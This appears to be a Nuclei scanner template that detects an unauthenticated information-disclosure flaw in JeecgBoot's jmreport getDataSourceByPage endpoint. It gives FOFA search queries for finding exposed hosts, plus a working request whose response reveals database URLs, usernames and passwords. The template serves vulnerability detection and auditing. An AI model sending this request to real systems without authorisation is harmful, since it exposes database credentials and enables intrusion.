id: JeecgBoot-getDataSourceByPage-Information-disclosure

info:
  name: JeecgBoot 积木报表 getDataSourceByPage 信息泄露漏洞
  author: Superhero
  severity: medium
  description: |-
    fofa: title=="JeecgBoot 企业级低代码平台" || body="window._CONFIG['imgDomainURL'] = 'http://localhost:8080/jeecg-boot/" || title="Jeecg-Boot 企业级快速开发平台" || title="Jeecg 快速开发平台" || body="'http://fileview.jeecg.com/onlinePreview'" || title=="JeecgBoot 企业级低代码平台" || title=="Jeecg-Boot 企业级快速开发平台" || title=="JeecgBoot 企业级快速开发平台" || title=="JeecgBoot 企业级快速开发平台" || title="Jeecg 快速开发平台" || title="Jeecg-Boot 快速开发平台" || body="积木报表" || body="jmreport"
    JeecgBoot 积木报表 getDataSourceByPage接口存在信息泄露漏洞，未经身份验证的远程攻击者可利用此漏洞获取网站数据库用户密码等敏感信息，从而登录网站数据库，使网站处于极不安全的状态。
  reference:
    - https://mp.weixin.qq.com/s/zyMayqsyL5am574M6xPtkQ
  tags: Information disclosure

http:
  - raw:
      - |
        GET /jmreport/getDataSourceByPage HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"dbDriver"'
          - '"dbUrl"'
          - '"dbUsername"'
          - '"dbPassword"'
        condition: and
      - type: status
        status: 
          - 200